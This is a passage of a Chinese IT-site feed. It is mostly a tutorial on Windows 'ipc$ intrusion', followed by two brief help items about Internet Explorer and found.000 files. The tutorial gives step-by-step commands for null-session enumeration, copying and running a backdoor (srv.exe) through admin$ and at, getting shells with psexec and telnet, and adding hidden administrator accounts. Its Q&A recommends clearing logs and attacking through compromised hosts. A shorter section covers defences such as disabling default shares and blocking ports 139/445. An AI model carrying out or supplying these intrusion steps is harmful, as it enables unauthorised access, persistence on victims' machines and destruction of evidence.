<P>空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码），但根据WIN2000的访问控制模型，空会话的建立同样需要提供一个令牌，可是空会话在建立过程中并没有经过用户信息的认证，所以这个令牌中不包含用户信息，因此，这个会话不能让系 统间发送加密信息，但这并不表示空会话的令牌中不包含安全标识符SID（它标识了用户和所属组），对于一个空会话，LSA提供的令牌的SID是S-1-5-7，这就是空会话的SID，用户名是：ANONYMOUS LOGON（这个用户名是可以在用户列表中看到的，但是是不能在SAM数据库中找到，属于系统内置的帐号），这个访问令牌包含下面伪装的组： <BR>Everyone <BR>Network<BR>在安全策略的限制下，这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢？ </P>
<P><BR>四 空会话可以做什么 <BR>对于NT，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问everyone权限的共享，访问小部分注册表等，并没有什么太大的利用价值；对2000作用更小，因为在Windows 2000 和以后版本中默认只有管理员和备份#作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。<BR>从这些我们可以看到，这种非信任会话并没有多大的用处，但从一次完整的ipc$入侵来看，空会话是一个不可缺少的跳板，因为我们从它那里可以得到户列表，而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的，成功的导出用户列表大大增加了猜解的成 功率，仅从这一点，足以说明空会话所带来的安全隐患，因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令：</P>
<P><BR>1 首先，我们先建立一个空连接（当然，这需要目标开放ipc$）<BR>命令：net use \\ip\ipc$ "" /user:""<BR>注意：上面的命令包括四个空格，net与use中间有一个空格，use后面一个，密码左右各一个空格。</P>
<P><BR>2 查看远程主机的共享资源<BR>命令：net view \\ip<BR>解释：前提是建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下面的结果，但此命令不能显示默认共享。</P>
<P>在 \\*.*.*.*的共享资源<BR>资源共享名 类型 用途 注释</P>
<P>-----------------------------------------------------------<BR>NETLOGON Disk Logon server share<BR>SYSVOL Disk Logon server share<BR>命令成功完成。</P>
<P>3 查看远程主机的当前时间<BR>命令： net time \\ip<BR>解释：用此命令可以得到一个远程主机的当前时间。</P>
<P><BR>4 得到远程主机的NetBIOS用户名列表（需要打开自己的NBT）<BR>命令：nbtstat -A ip<BR>用此命令可以得到一个远程主机的NetBIOS用户名列表，返回如下结果：</P>
<P>Node IpAddress: [*.*.*.*] Scope Id: []</P>
<P>NetBIOS Remote Machine Name Table</P>
<P>Name Type Status<BR>---------------------------------------------<BR>SERVER UNIQUE Registered<BR>OYAMANISHI-H GROUP Registered<BR>OYAMANISHI-H GROUP Registered<BR>SERVER UNIQUE Registered<BR>OYAMANISHI-H UNIQUE Registered<BR>OYAMANISHI-H GROUP Registered<BR>SERVER UNIQUE Registered<BR>OYAMANISHI-H UNIQUE Registered<BR>..__M##ROWSE__. GROUP Registered<BR>INet~Services GROUP Registered<BR>IS~SERVER...... UNIQUE Registered</P>
<P>MAC Address = 00-50-8B-9A-2D-37</P>
<P><BR>以上就是我们经常使用空会话做的事情，好像也能获得不少东西哟，不过要注意一点：建立IPC$连接的#作会在Event Log中留下记录，不管你是否登录成功。 好了，那么下面我们就来看看ipc$所使用的端口是什么？</P>
<P><BR>五 ipc$所使用的端口<BR>首先我们来了解一些基础知识：<BR>1 SMB: (Server Message Block) Windows协议族，用于文件打印共享的服务；<BR>2 NBT: (NETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）端口实现基于TCP/IP协议的NETBIOS网络互联。<BR>3 在WindowsNT中SMB基于NBT实现，即使用139（TCP）端口；而在Windows2000中，SMB除了基于NBT实现，还可以直接通过445端口实现。</P>
<P>有了这些基础知识，我们就可以进一步来讨论访问网络共享对端口的选择了：</P>
<P>对于win2000客户端（发起端）来说：<BR>1 如果在允许NBT的情况下连接服务器时，客户端会同时尝试访问139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，用455端口进行会话，当445端口无响应时，才使用139端口，如果两个端口都没有响应，则会话失败；<BR>2 如果在禁止NBT的情况下连接服务器时，那么客户端只会尝试访问445端口，如果445端口无响应，那么会话失败。</P>
<P><BR>对于win2000服务器端来说：<BR>1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放（LISTENING）；<BR>2 如果禁止NBT，那么只有445端口开放。</P>
<P><BR>我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见，如果远程服务器没有监听139或445端口，ipc$会话是无法建立的。</P>
<P><BR>六 ipc管道在hack攻击中的意义<BR>ipc管道本来是微软为了方便管理员进行远程管理而设计的，但在入侵者看来，开放ipc管道的主机似乎更容易得手。通过ipc管道，我们可以远程调用一些系统函数（大多通过工具实现，但需要相应的权限），这往往是入侵成败的关键。如果不考虑这些，仅从传送 文件这一方面，ipc管道已经给了入侵者莫大的支持，甚至已经成为了最重要的传输手段，因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。当然，我们也不能忽视权限在ipc管道中扮演的重要角色，想必你一定品尝过空会 话的尴尬，没有权限，开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限，那么ipc管道这把双刃剑将显示出它狰狞的一面。</P>
<P><BR>七 ipc$连接失败的常见原因<BR>以下是一些常见的导致ipc$连接失败的原因：</P>
<P>1 IPC连接是Windows NT及以上系统中特有的功能，由于其需要用到Windows NT中很多DLL函数，所以不能在Windows 9.x/Me系统中运行，也就是说只有nt/2000/xp才可以相互建立ipc$连接，98/me是不能建立ipc$连接的；</P>
<P><BR>2 如果想成功的建立一个ipc$连接，就需要响应方开启ipc$共享，即使是空连接也是这样，如果响应方关闭了ipc$共享，将不能建立连接；</P>
<P><BR>3 连接发起方未启动Lanmanworkstation服务（显示名为：Workstation）：它提供网络链结和通讯，没有它发起方无法发起连接请求；</P>
<P><BR>4 响应方未启动Lanmanserver服务（显示名为：Server）：它提供了 RPC 支持、文件、打印以及命名管道共享，ipc$依赖于此服务，没有它主机将无法响应发起方的连接请求，不过没有它仍可发起ipc$连接；</P>
<P><BR>5 响应方未启动NetLogon，它支持网络上计算机 pass-through 帐户登录身份（不过这种情况好像不多）；</P>
<P><BR>6 响应方的139，445端口未处于监听状态或被防火墙屏蔽；</P>
<P><BR>7 连接发起方未打开139，445端口；</P>
<P><BR>8 用户名或者密码错误：如果发生这样的错误，系统将给你类似于''无法更新密码''这样的错误提示（显然空会话排除这种错误）；</P>
<P><BR>9 命令输入错误：可能多了或少了空格，当用户名和密码中不包含空格时两边的双引号可以省略，如果密码为空，可以直接输入两个引号""即可；</P>
<P><BR>10 如果在已经建立好连接的情况下对方重启计算机，那么ipc$连接将会自动断开，需要重新建立连接。 </P>
<P><BR>另外,你也可以根据返回的错误号分析原因： </P>
<P>错误号5，拒绝访问：很可能你使用的用户不是管理员权限的； <BR>错误号51，Windows无法找到网络路径：网络有问题； <BR>错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）； <BR>错误号67，找不到网络名：你的lanmanworkstation服务未启动或者目标删除了ipc$； <BR>错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连； <BR>错误号1326，未知的用户名或错误密码：原因很明显了； <BR>错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动；<BR>错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。 </P>
<P><BR>八 复制文件失败的原因<BR>有些朋友虽然成功的建立了ipc$连接，但在copy时却遇到了这样那样的麻烦，无法复制成功，那么导致复制失败的常见原因又有哪些呢？</P>
<P><BR>1 对方未开启共享文件夹<BR>这类错误出现的最多，占到50%以上。许多朋友在ipc$连接建立成功后，甚至都不知道对方是否有共享文件夹，就进行盲目复制，结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下你想要复制的共享文件夹是否存在（用软件查看当然更好），不要认为能建立ipc$连接就一定有共享文件夹存在。</P>
<P><BR>2 向默认共享复制失败<BR>这类错误也是大家经常犯的，主要有两个小方面：</P>
<P>1）错误的认为能建立ipc$连接的主机就一定开启了默认共享，因而在建立完连接之后马上向c$,d$,admin$之类的默认共享复制文件，一旦对方未开启默认共享，将导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享，并不能说明默认共享 一定存在。ipc$共享与默认共享是两码事，ipc$共享是一个命名管道，并不是哪个实际的文件夹，而默认共享却是实实在在的共享文件夹；</P>
<P>2）由于net view \\IP 这个命令无法显示默认共享文件夹（因为默认共享带$），因此通过这个命令，我们并不能判断对方是否开启了默认共享，因此如果对方未开启默认共享，那么所有向默认共享进行的#作都不能成功；（不过大部分扫描软件在扫弱口令的同时，都能扫到默认共享目录，可以 避免此类错误的发生）</P>
<P>要点：请大家一定区分ipc共享，默认共享，普通共享这三者的区别：ipc共享是一个管道，并不是实际的共享文件夹；默认共享是安装时默认打开的文件夹；普通共享是我们自己开启的可以设置权限的共享文件夹。</P>
<P><BR>3用户权限不够，包括四种情形：<BR>1）空连接向所有共享（默认共享和普通共享）复制时，权限是不够的；<BR>2）向默认共享复制时，在Win2000 Pro版中，只有Administrators和Backup Operators组成员才可以，在Win2000 Server版本 Server Operatros组也可以访问到这些共享目录； <BR>3）向普通共享复制时，要具有相应权限（即对方管理员事先设定的访问权限）；<BR>4）对方可以通过防火墙或安全软件的设置，禁止外部访问共享；</P>
<P>注意：<BR>1 不要认为administrator就一定具有管理员权限，管理员名称是可以改的<BR>2 管理员可以访问默认共享的文件夹，但不一定能够访问普通的共享文件夹，因为管理员可以对普通的共享文件夹进行访问权限设置，如图6，管理员为D盘设置的访问权限为仅允许名为xinxin的用户对该文件夹进行完全访问，那么此时即使你拥有管理员权限，你仍然 不能访问D盘。不过有意思的是，如果此时对方又开启了D$的默认共享，那么你却可以访问D$，从而绕过了权限限制，有兴趣的朋友可以自己做测试。</P>
<P><BR>4被防火墙杀死或在局域网<BR>还有一种情况，那就是也许你的复制#作已经成功，但当远程运行时，被防火墙杀掉了，导致找不到文件；或者你把木马复制到了局域网内的主机，导致连接失败（反向连接的木马不会发生这种情况）。如果你没有想到这种情况，你会以为是复制上出了问题，但实际你的复 制#作已经成功了，只是运行时出了问题。</P>
<P><BR>呵呵，大家也知道，ipc$连接在实际#作过程中会出现各种各样的问题，上面我所总结的只是一些常见错误，没说到的，大家可以给我提个醒儿。</P>
<P><BR>九 关于at命令和xp对ipc$的限制<BR>本来还想说一下用at远程运行程序失败的原因，但考虑到at的成功率不是很高，问题也很多，在这里就不提它了（提的越多，用的人就越多），而是推荐大家用p***ec.exe远程运行程序，假设想要远程机器执行本地c:\xinxin.exe文件，且管理 员为administrator，密码为1234，那么输入下面的命令：<BR>p***ec \\ip -u administrator -p 1234 -c c:\xinxin.exe<BR>如果已经建立ipc连接，则-u -p这两个参数不需要，p***ec.exe将自动拷贝文件到远程机器并运行。</P>
<P>本来xp中的ipc$也不想在这里讨论，想单独拿出来讨论，但看到越来越多的朋友很急切的提问为什么遇到xp的时候，大部分#作都很难成功。我在这里就简单提一下吧，在xp的默认安全选项中，任何远程访问仅被赋予来宾权限，也就是说即使你是用管理员帐户和 密码，你所得到的权限也只是Guest，因此大部分#作都会因为权限不够而失败，而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了xp的管理员密码，我建议你尽量避开ipc管道。</P>
<P><BR>十 如何打开目标的IPC$共享以及其他共享<BR>目标的ipc$不是轻易就能打开的，否则就要天下打乱了。你需要一个admin权限的shell，比如telnet，木马，cmd重定向等，然后在shell下执行：<BR>net share ipc$<BR>开放目标的ipc$共享；<BR>net share ipc$ /del<BR>关闭目标的ipc$共享；如果你要给它开共享文件夹，你可以用：<BR>net share xinxin=c:\<BR>这样就把它的c盘开为共享名为xinxin共享文件夹了。（可是我发现很多人错误的认为开共享文件夹的命令是net share c$，还大模大样的给菜鸟指指点点，真是误人子弟了）。再次声明，这些#作都是在shell下才能实现的。</P>
<P>十一 一些需要shell才能完成的命令<BR>看到很多教程这方面写的十分不准确，一些需要shell才能完成命令就简简单单的在ipc$连接下执行了，起了误导作用。那么下面我总结一下需要在shell才能完成的命令：</P>
<P>1 向远程主机建立用户，激活用户，修改用户密码，加入管理组的#作需要在shell下完成；</P>
<P>2 打开远程主机的ipc$共享，默认共享，普通共享的#作需要在shell下完成；</P>
<P>3 运行/关闭远程主机的服务，需要在shell下完成；</P>
<P>4 启动/杀掉远程主机的进程，也需要在shell下完成（用软件的情况下除外，如pskill）。</P>
<P><BR>十二 入侵中可能会用到的命令<BR>为了这份教程的完整性，我列出了ipc$入侵中的一些常用命令，如果你已经掌握了这些命令，你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程，如果只适用于本地，你只能在获得远程主机的shell（如cmd，telnet等）后，才能 向远程主机执行。</P>
<P><BR>1 建立/删除ipc$连接的命令</P>
<P>1）建立空连接:<BR>net use \\127.0.0.1\ipc$ "" /user:"" </P>
<P>2）建立非空连接:<BR>net use \\127.0.0.1\ipc$ "密码" /user:"用户名" </P>
<P>3）删除连接:<BR>net use \\127.0.0.1\ipc$ /del</P>
<P><BR>2 在ipc$连接中对远程主机的#作命令</P>
<P>1） 查看远程主机的共享资源（看不到默认共享）:<BR>net view \\127.0.0.1 </P>
<P>2） 查看远程主机的当前时间:<BR>net time \\127.0.0.1 </P>
<P>3） 得到远程主机的netbios用户名列表:<BR>nbtstat -A 127.0.0.1 </P>
<P>4）映射/删除远程共享:<BR>net use z: \\127.0.0.1\c <BR>此命令将共享名为c的共享资源映射为本地z盘 </P>
<P>net use z: /del <BR>删除映射的z盘，其他盘类推</P>
<P>5）向远程主机复制文件:<BR>copy 路径\文件名 \\IP\共享目录名，如：<BR>copy c:\xinxin.exe \\127.0.0.1\c$ 即将c盘下的xinxin.exe复制到对方c盘内<BR>当然，你也可以把远程主机上的文件复制到自己的机器里：<BR>copy \\127.0.0.1\c$\xinxin.exe c:\</P>
<P>6）远程添加计划任务:<BR>at \\IP 时间 程序名 如：<BR>at \\127.0.0.0 11:00 xinxin.exe<BR>注意：时间尽量使用24小时制；如果你打算运行的程序在系统默认搜索路径（比如system32/）下则不用加路径，否则必须加全路径</P>
<P><BR>3 本地命令</P>
<P>1）查看本地主机的共享资源（可以看到本地的默认共享）<BR>net share</P>
<P>2）得到本地主机的用户列表<BR>net user</P>
<P>3）显示本地某用户的帐户信息<BR>net user 帐户名</P>
<P>4）显示本地主机当前启动的服务<BR>net start </P>
<P>5）启动/关闭本地服务<BR>net start 服务名 <BR>net stop 服务名 </P>
<P>6）在本地添加帐户<BR>net user 帐户名 密码 /add</P>
<P>7）激活禁用的用户<BR>net uesr 帐户名 /active:yes</P>
<P>8）加入管理员组<BR>net localgroup administrators 帐户名 /add </P>
<P>很显然的是，虽然这些都是本地命令，但如果你在远程主机的shell中输入，比如你telnet成功后输入上面这些命令，那么这些本地输入将作用在远程主机上。</P>
<P><BR>4 其他一些命令<BR>1）telnet <BR>telnet IP 端口<BR>telnet 127.0.0.0 23</P>
<P>2）用opentelnet.exe开启远程主机的telnet<BR>OpenTelnet.exe \\ip 管理员帐号 密码 NTLM的认证方式 port<BR>OpenTelnet.exe \\127.0.0.1 administrator "" 1 90<BR>不过这个小工具需要满足四个要求：<BR>1）目标开启了ipc$共享<BR>2）你要拥有管理员密码和帐号<BR>3）目标开启RemoteRegistry服务，用户就可以更改ntlm认证<BR>4）对仅WIN2K/XP有效</P>
<P>3）用p***ec.exe一步获得shell，需要ipc管道支持<BR>p***ec.exe \\IP -u 管理员帐号 -p 密码 cmd<BR>p***ec.exe \\127.0.0.1 -u administrator -p "" cmd</P>
<P><BR>十三 对比过去和现今的ipc$入侵<BR>既然是对比，那么我就先把过去的ipc$入侵步骤写给大家，都是蛮经典的步骤：</P>
<P>[1]<BR>C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators<BR>\\用扫到的空口令建立连接　　 </P>
<P>[2]<BR>c:\>net view \\127.0.0.1<BR>\\查看远程的共享资源</P>
<P>[3]<BR>C:\>copy srv.exe \\127.0.0.1\admin$\system32 <BR>\\将一次性后门srv.exe复制到对方的系统文件夹下，前提是admin$开启　　</P>
<P>[4]<BR>C:\>net time \\127.0.0.1 <BR>\\查看远程主机的当前时间</P>
<P>[5]<BR>C:\>at \\127.0.0.1 时间 srv.exe <BR>\\用at命令远程运行srv.exe，需要对方开启了''Task Scheduler''服务　　</P>
<P>[6]<BR>C:\>net time \\127.0.0.1<BR>\\再次查看当前时间来估算srv.exe是否已经运行，此步可以省略</P>
<P>[7]　　　　<BR>C:\>telnet 127.0.0.1 99 <BR>\\开一个新窗口，用telnet远程登陆到127.0.0.1从而获得一个shell(不懂shell是什么意思？那你就把它想象成远程机器的控制权就好了，#作像DOS)，99端口是srv.exe开的一次性后门的端口　　</P>
<P>[8]<BR>C:\WINNT\system32>net start telnet<BR>\\我们在刚刚登陆上的shell中启动远程机器的telnet服务，毕竟srv.exe是一次性的后门，我们需要一个长久的后门便于以后访问，如果对方的telnet已经启动，此步可省略</P>
<P>[9]<BR>C:\>copy ntlm.exe \\127.0.0.1\admin$\system32<BR>\\在原来那个窗口中将ntlm.exe传过去，ntlm.exe是用来更改telnet身份验证的　　</P>
<P>[10]<BR>C:\WINNT\system32>ntlm.exe <BR>\\在shell窗口中运行ntlm.exe，以后你就可以畅通无阻的telnet这台主机了<BR>　　<BR>[11]<BR>C:\>telnet 127.0.0.1 23<BR>\\在新窗口中telnet到127.0.0.1，端口23可省略，这样我们又获得一个长期的后门</P>
<P>[12]<BR>C:\WINNT\system32>net user 帐户名 密码 /add<BR>C:\WINNT\system32>net uesr guest /active:yes<BR>C:\WINNT\system32>net localgroup administrators 帐户名 /add<BR>\\telnet上以后，你可以建立新帐户，激活guest，把任何帐户加入管理员组等</P>
<P>好了，写到这里我似乎回到了2，3年前，那时的ipc$大家都是这么用的，不过随着新工具的出现，上面提到的一些工具和命令现在已经不常用到了，那就让我们看看现在的高效而简单的ipc$入侵吧。</P>
<P>[1]<BR>p***ec.exe \\IP -u 管理员帐号 -p 密码 cmd <BR>\\用这个工具我们可以一步到位的获得shell</P>
<P>OpenTelnet.exe \\server 管理员帐号 密码 NTLM的认证方式 port<BR>\\用它可以方便的更改telnet的验证方式和端口，方便我们登陆</P>
<P>[2]<BR>已经没有第二步了，用一步获得shell之后，你做什么都可以了，安后门可以用winshell，克隆就用ca吧，开终端用3389.vbe，记录密码用win2kpass，总之好的工具不少，随你选了，我就不多说了。</P>
<P><BR>十四 如何防范ipc$入侵察看本地共享资源<BR>运行-cmd-输入net share<BR>删除共享(每次输入一个）<BR>net share ipc$ /delete<BR>net share admin$ /delete<BR>net share c$ /delete<BR>net share d$ /delete（如果有e,f,……可以继续删除）</P>
<P>1 禁止空连接进行枚举(此#作并不能阻止空连接的建立)</P>
<P>运行regedit，找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：1<BR>如果设置为"1"，一个匿名用户仍然可以连接到IPC$共享，但无法通过这种连接得到列举SAM帐号和共享信息的权限；在Windows 2000 中增加了"2"，未取得匿名权的用户将不能进行ipc$空连接。建议设置为1。如果上面所说的主键不存在，就新建一个再改键值。如果你觉得改注册表麻烦，可以在本地安全设置中设置此项： 在本地安全设置－本地策略－安全选项－''对匿名连接的额外限制''</P>
<P><BR>2 禁止默认共享</P>
<P>1）察看本地共享资源<BR>运行-cmd-输入net share</P>
<P>2）删除共享（重起后默认共享仍然存在）<BR>net share ipc$ /delete<BR>net share admin$ /delete<BR>net share c$ /delete<BR>net share d$ /delete（如果有e,f,……可以继续删除）</P>
<P>3）停止server服务<BR>net stop server /y （重新启动后server服务会重新开启）</P>
<P>4）禁止自动打开默认共享（此#作并不能关闭ipc$共享） <BR>运行-regedit</P>
<P>server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。 </P>
<P>pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。 <BR>这两个键值在默认情况下在主机上是不存在的，需要自己手动添加，修改后重起机器使设置生效。</P>
<P><BR>3 关闭ipc$和默认共享依赖的服务:server服务<BR>如果你真的想关闭ipc$共享，那就禁止server服务吧：<BR>控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-选已禁用，这时可能会有提示说：XXX服务也会关闭是否继续，因为还有些次要的服务要依赖于server服务，不要管它。 </P>
<P><BR>4 屏蔽139，445端口 <BR>由于没有以上两个端口的支持，是无法建立ipc$的，因此屏蔽139，445端口同样可以阻止ipc$入侵。</P>
<P>1）139端口可以通过禁止NBT来屏蔽<BR>本地连接－TCP/IT属性－高级－WINS－选‘禁用TCP/IT上的NETBIOS’一项</P>
<P>2）445端口可以通过修改注册表来屏蔽<BR>添加一个键值<BR>Hive: HKEY_LOCAL_MACHINE<BR>Key: System\Controlset\Services\NetBT\Parameters<BR>Name: SMBDeviceEnabled <BR>Type: REG_DWORD<BR>value: 0<BR>修改完后重启机器<BR>注意：如果屏蔽掉了以上两个端口，你将无法用ipc$入侵别人。 </P>
<P>3）安装防火墙进行端口过滤</P>
<P><BR>6 设置复杂密码，防止通过ipc$穷举出密码，我觉得这才是最好的办法，增强安全意识，比不停的打补丁要安全的多。</P>
<P><BR>十五 ipc$入侵问答精选<BR>1.进行ipc$入侵的时候，会在服务器中留下记录，有什么办法可以不让服务器发现吗？</P>
<P>答：留下记录是一定的，你走后用清除日志程序删除就可以了，或者用肉鸡入侵。</P>
<P><BR>2.你看下面的情况是为什么，可以连接但不能复制<BR>net use \\***.***.***.***\ipc$ "密码" /user:"用户名"<BR>命令成功<BR>copy icmd.exe \\***.***.***.***\admin$<BR>找不到网络路径<BR>命令不成功</P>
<P>答：像“找不到网络路径”“找不到网络名”之类的问题，大多是因为你想要复制到的共享文件夹没有开启，所以在复制的时候会出现错误，你可以试着找找其他的共享文件夹。</P>
<P><BR>3.如果对方开了IPC$，且能建立空联接，但打开C、D盘时，都要求密码，我知道是空连接没有太多的权限，但没别的办法了吗？</P>
<P>答：建议先用流光或者别的什么扫描软件试着猜解一下密码，如果猜不出来，只能放弃，毕竟空连接的能力有限。</P>
<P><BR>4.我已经猜解到了管理员的密码，且已经ipc$连接成功了，但net view \\ip发现它没开默认共享，我该怎么办？</P>
<P>答：首先纠正你的一个错误，用net view \\ip是无法看到默认共享的，你可以试着将文件复制到c$，d$看看，如果都不行，说明他关闭了默认共享，那你就用opentelnet.exe或p***ec.exe吧，用法上面有。</P>
<P><BR>5.ipc$连接成功后，我用下面的命令建立了一个帐户，却发现这个帐户在我自己的机器上，这是怎么回事？<BR>net uset ccbirds /add</P>
<P>答：ipc$建立成功只能说明你与远程主机建立了通信隧道，并不意味你取得了一个shell，只有在获得一个shell（比如telnet）之后，你才能在远程机器建立一个帐户，否则你的#作只是在本地进行。</P>
<P><BR>6.我已进入了一台肉机，用的管理员帐号，可以看他的系统时间，但是复制程序到他的机子上却不行，每次都提示“拒绝访问，已复制0个文件”，是不是对方有什么服务没开，我该怎么办？</P>
<P>答：一般来说“拒绝访问”都是权限不够的结果，可能是你用的帐户有问题，还有一种可能，如果你想向普通共享文件夹复制文件却返回这个错误，说明这个文件夹设置的允许访问用户中不包括你（哪怕你是管理员），这一点我在上一期文章中分析了。</P>
<P><BR>7.我用Win98能与对方建立ipc$连接吗？</P>
<P>答：理论上不可以，要进行ipc$的#作，建议用win2000，用其他#作系统会带来许多不必要的麻烦。</P>
<P><BR>8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话，但用nbtstat -A IP 却无法导出用户列表，这是为什么？</P>
<P>答：空会话在默认的情况下是可以导出用户列表的，但如果管理员通过修改注册表来禁止导出列表，就会出现你所说的情况；还有可能是你自己的NBT没有打开，netstat命令是建立在NBT之上的。　　</P>
<P><BR>9.我建立ipc$连接的时候返回如下信息：‘提供的凭据与已存在的凭据集冲突’，怎么回事？</P>
<P>答：呵呵，这说明你已经与目标主机建立了ipc$连接，两个主机间同时建立两个ipc$连接是不允许的。</P>
<P><BR>10.我在映射的时候出现：<BR>F:\>net use h: \\211.161.134.*\e$<BR>系统发生 85 错误。<BR>本地设备名已在使用中。这是怎么回事？</P>
<P>答：你也太粗心了吧，这说明你有一个h盘了，映射到没有的盘符吧！</P>
<P><BR>11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"guest" 成功了，但当我映射时出现了错误，向我要密码，怎么回事？<BR>F:\>net use h: \\*.*.*.*\c$<BR>密码在 \\*.*.*.*\c$ 无效。<BR>请键入 \\*.*.*.*\c$ 的密码:<BR>系统发生 5 错误。<BR>拒绝访问。</P>
<P>答：呵呵，向你要密码说明你当前使用的用户权限不够，不能映射C$这个默认共享，想办法提升权限或者找管理员的弱口令吧！默认共享一般是需要管理员权限的。</P>
<P><BR>12.我用superscan扫到了一个开了139端口的主机，但为什么不能空连接呢？</P>
<P>答：你混淆了ipc$与139的关系，能进行ipc$连接的主机一定开了139或445端口，但开这两个端口的主机可不一定能空连接，因为对方可以关闭ipc$共享.</P>
<P><BR>13.我门局域网里的机器大多都是xp，我用流光扫描到几个administrator帐号口令是空，而且可以连接，但不能复制东西，说错误5。请问为什么？</P>
<P>答：xp的安全性要高一些，在安全策略的默认设置中，对本地帐户的网络登录进行身份验证的时候，默认为来宾权限，即使你用管理员远程登录，也只具有来宾权限，因此你复制文件，当然是错误5：权限不够。</P>
<P><BR>14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功，可是 net use i: \\192.168.0.2\c<BR>出现请键入 \\192.168.0.2 的密码，怎么回事情呢？我用的可是管理员呀？应该什么都可以访问呀？</P>
<P>答：虽然你具有管理员权限，但管理员在设置c盘共享权限时（注意：普通共享可以设置访问权限，而默认共享则不能）可能并未设置允许administrator访问，所以会出现上述问题。</P>
<P><BR>15.如果自己的机器禁止了ipc$, 是不是还可以用ipc$连接别的机器？如果禁止server服务呢？</P>
<P>答：禁止以上两项仍可以发起ipc$连接，不过这种问题自己动手试验会更好。</P>
<P><BR>16.能告诉我下面的两个错误产生的原因吗？<BR>c:\>net time \\61.225.*.*<BR>系统发生 5 错误。<BR>拒绝访问。</P>
<P>c:\>net view \\61.225.*.*<BR>系统发生 5 错误。<BR>拒绝访问。</P>
<P>答：起初遇到这个问题的时候我也很纳闷，错误5表示权限不够，可是连空会话的权限都可以完成上面的两个命令，他为什么不行呢？难道是他没建立连接？后来那个粗心的同志告诉我的确是这样，他忘记了自己已经删了ipc$连接，之后他又输入了上面那两个命令，随 之发生了错误5。</P>
<P><BR>17.您看看这是怎么回事？<BR>F:\>net time<BR>找不到时间服务器。<BR>请键入 NET HELPMSG 3912 以获得更多的帮助。</P>
<P>答：答案很简单，你的命令错了，应该是net time \\ip<BR>没输入ip地址，当然找不到服务器。view的命令也应该有ip地址，即：net view \\ip</P>
<P></FONT> </P></FONT>]]></description>
</item>

<item>
<title><![CDATA[IE以最大化显示]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2549</link>
<author>IT梦工场</author>
<pubDate>2008-8-25 12:35:00</pubDate>
<description><![CDATA[<P><FONT face=Verdana>让IE以最大化显示<BR>　　问：我使用的操作系统是Windows 2000，上网一段时间后，突然发觉IE无法以最大化显示，把IE重装一遍后，也无法解决这个问题，请问我该怎么办？</FONT></P>
<P><FONT face=Verdana>　　答：在“运行”中输入regedit打开注册表编辑器，选择“HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\”，在右边的窗口中删除“Window_Placement”键，在 “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Old Work-Areas”右边窗口中删除“OldWorkAreaRects”键。关闭注册表编辑器，重新启动计算机，连续两次最大化IE窗口(即“最大化→还原→最大化”)，再次重新启动IE就可以了。</FONT></P>
<P><FONT face=Verdana></FONT> </P>]]></description>
</item>

<item>
<title><![CDATA[FOUND.000文件夹的问题]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2548</link>
<author>IT梦工场</author>
<pubDate>2008-8-25 12:34:36</pubDate>
<description><![CDATA[<P><FONT face=Verdana>found.000文件夹的问题</FONT></P>
<P><FONT face=Verdana>问：我的电脑有的时候在C盘或D盘的根目录下有个名为found.000的文件夹，里面有一些后缀名为CHK的文件。在c:\windows下有很多以fff开头的怪文件，而且大小全部为0字节。请问这些是什么文件？能否将它们删除？</FONT></P>
<P><FONT face=Verdana>　　答：found.000文件夹里面的一些后缀名为CHK的文件是你在使用“磁盘碎片整理程序”整理硬盘后所产生的“丢失簇的恢复文件”。在c:\windows下有很多以fff开头的文件是由Mdm.exe(Machine Debug Manager)这个程序产生的。Mdm.exe的主要工作是针对应用软件进行排错(Debug)，在排错过程中会产生一些暂存文件，这些文件在操作系统进行关机时没有自动被清除，所以这些fff开头的怪文件和found.000文件夹里面的一些后缀名为CHK的文件都是没有用的垃圾文件，可以任意删除而不会对系统产生不良影响。</FONT></P>
